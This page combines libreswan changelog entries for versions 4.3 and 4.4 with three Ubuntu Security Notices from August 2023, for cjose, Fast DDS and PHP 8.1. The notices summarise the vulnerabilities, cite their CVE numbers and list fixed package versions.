\* portexcludes: update to use python3 \[Kim\]
\* building: fix NetBSD build \[Andrew\]
\* building: fix arm / aarch64 build \[kekePower@github\]
\* building: Remove support for RHEL6 USE\_OLD\_SELINUX \[Paul\]
\* packaging: handle properly rpm sysctl config \[Tuomo\]
\* packaging: rhel7: fix python2 shebang \[Tuomo\]

*   Aug 20, 2021
*   f36ab1b
*   zip
*   tar.gz

v4.4 (April 22, 2021)

\* IKEv2: Fixes for TCP encap in Transport Mode and host-to-host \[Paul/Sabrina\]
\* IKEv2: Fixes to Labeled IPsec policies \[Kavinda Wewegama/Paul\]
\* IKEv2: Add redirect statistics to whack --globalstatus \[Clive Zagno\]
\* IKEv2: Connections would not always switch when needed \[Andrew/Paul\]
\* pluto: Fix for host-to-host connections use non-standard IKE ports \[Paul\]
\* pluto: Use peer ID (IKEv2 IDr, IKEv1 Aggr) to select best initial conn \[Paul\]
\* pluto: Disable interface-ip= as the feature is not yet implemented \[Paul\]
\* pluto: Fix PLUTO\_PEER\_CLIENT\* in updown for NAT + Transport Mode \[Paul\]
\* pluto: Remove never updated PLUTO\_VERSION for updown scripts \[Paul\]
\* pluto: Actually set PLUTO\_CONNECTION\_TYPE= to transport or tunnel \[Paul\]
\* pluto: Allow non-templated wildcard ID connections to match \[Paul\]
\* pluto: Reduce and merge various logging messages \[Andrew\]
\* libipsecconf: Do not allow vhost/vnet in IKEv2 connections \[Paul\]
\* XFRM: Restarting pluto when using ipsec-interface= could fail \[Paul\]
\* contrib/munin: Update plugin to use python3 and update doc header \[Tuomo\]
\* testing: Enable OpenBSD interop tests \[Paul/Ravi\]
\* testing: Make tests more reliable on KVM \[Andrew\]

*   Apr 22, 2021
*   383a28e
*   zip
*   tar.gz

v4.3 (February 21, 2021)

\* pluto: Restore range checking on Labeled IPsec \[Paul/Andrew\]
\* pluto: Higher state serialno does not imply newest state \[Paul\]
\* pluto: Cleanup ip\_address vs ip\_endpoint (protoport dropping) \[Andrew\]
\* pluto: Revival of code could accidentally fallback to IKEv1 \[Andrew\]
\* newhostkey: Add support for generating ECDSA keys \[Daiki Ueno\]
\* libipsecconf: Ignore empty option at end of config (rhbz#1685653) \[Andrew\]
\* whack: Add --global-redirect and --global-redirect-to options \[Pietro Monteiro\]

*   Feb 21, 2021
*   8a6ccf7
*   zip
*   tar.gz

CVE-2023-38712: Tags · libreswan/libreswan

Ubuntu Security Notice 6307-1 - It was discovered that JOSE for C/C++ AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE. An attacker could use this to cause a denial of service or might expose sensitive information.

=========================================================================  
Ubuntu Security Notice USN-6307-1  
August 24, 2023

cjose vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

JOSE for C/C++ could be made to crash if it received specially crafted input.

Software Description:  
- cjose: C library implementing the JOSE standard (development files)

Details:

It was discovered that JOSE for C/C++ AES GCM decryption routine incorrectly  
uses the Tag length from the actual Authentication Tag provided in the JWE.  
An attacker could use this to cause a denial of service (system crash) or  
might expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libcjose0                       0.6.2.1-1ubuntu0.1

Ubuntu 22.04 LTS:  
  libcjose0                       0.6.1+dfsg1-3ubuntu1.1

Ubuntu 20.04 LTS:  
  libcjose0                       0.6.1+dfsg1-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libcjose0                       0.6.0+dfsg1-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6307-1  
  CVE-2023-37464

Package Information:  
  https://launchpad.net/ubuntu/+source/cjose/0.6.2.1-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/cjose/0.6.1+dfsg1-3ubuntu1.1  
  https://launchpad.net/ubuntu/+source/cjose/0.6.1+dfsg1-1ubuntu0.1

Ubuntu Security Notice USN-6307-1

Ubuntu Security Notice 6306-1 - It was discovered that Fast DDS incorrectly handled certain inputs. A remote attacker could possibly use this issue to cause a denial of service and information exposure. This issue only affected Ubuntu 22.04 LTS. It was discovered that Fast DDS incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash.

    ==========================================================================Ubuntu Security Notice USN-6306-1August 24, 2023fastdds vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS (Available with Ubuntu Pro)Summary:Fast DDS could be made to crash or expose sensitive information if itreceived specially crafted input.Software Description:- fastdds: eProsima FastDDS Discovery Server and ToolsDetails:It was discovered that Fast DDS incorrectly handled certain inputs.A remote attacker could possibly use this issue to cause a denial ofservice and information exposure. This issue only affected Ubuntu22.04 LTS. (CVE-2021-38425)It was discovered that Fast DDS incorrectly handled certain inputs.An attacker could possibly use this issue to cause a crash.(CVE-2023-39534, CVE-2023-39945, CVE-2023-39946, CVE-2023-39947,CVE-2023-39948, CVE-2023-39949)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   fastdds-tools                   2.9.1+ds-1ubuntu0.1   libfastrtps2.9                  2.9.1+ds-1ubuntu0.1Ubuntu 22.04 LTS (Available with Ubuntu Pro):   fastdds-tools                   2.5.0+ds-3ubuntu0.1~esm1   libfastrtps2.5                  2.5.0+ds-3ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6306-1   CVE-2021-38425, CVE-2023-39534, CVE-2023-39945, CVE-2023-39946,   CVE-2023-39947, CVE-2023-39948, CVE-2023-39949Package Information:   https://launchpad.net/ubuntu/+source/fastdds/2.9.1+ds-1ubuntu0.1

Ubuntu Security Notice USN-6306-1

Ubuntu Security Notice 6305-1 - It was discovered that PHP incorrectly handled certain XML files. An attacker could possibly use this issue to expose sensitive information. It was discovered that PHP incorrectly handled certain PHAR files. An attacker could possibly use this issue to cause a crash, expose sensitive information or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6305-1  
August 23, 2023

php8.1 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain XML files.  
An attacker could possibly use this issue to expose sensitive information.  
(CVE-2023-3823)

It was discovered that PHP incorrectly handled certain PHAR files.  
An attacker could possibly use this issue to cause a crash,  
expose sensitive information or execute arbitrary code.  
(CVE-2023-3824)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.3  
  php8.1                          8.1.12-1ubuntu4.3  
  php8.1-cgi                      8.1.12-1ubuntu4.3  
  php8.1-cli                      8.1.12-1ubuntu4.3  
  php8.1-fpm                      8.1.12-1ubuntu4.3  
  php8.1-xml                      8.1.12-1ubuntu4.3

Ubuntu 22.04 LTS:  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.14  
  php8.1                          8.1.2-1ubuntu2.14  
  php8.1-cgi                      8.1.2-1ubuntu2.14  
  php8.1-cli                      8.1.2-1ubuntu2.14  
  php8.1-fpm                      8.1.2-1ubuntu2.14  
  php8.1-xml                      8.1.2-1ubuntu2.14

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6305-1  
  CVE-2023-3823, CVE-2023-3824

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.3  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.14

Tag

#ubuntu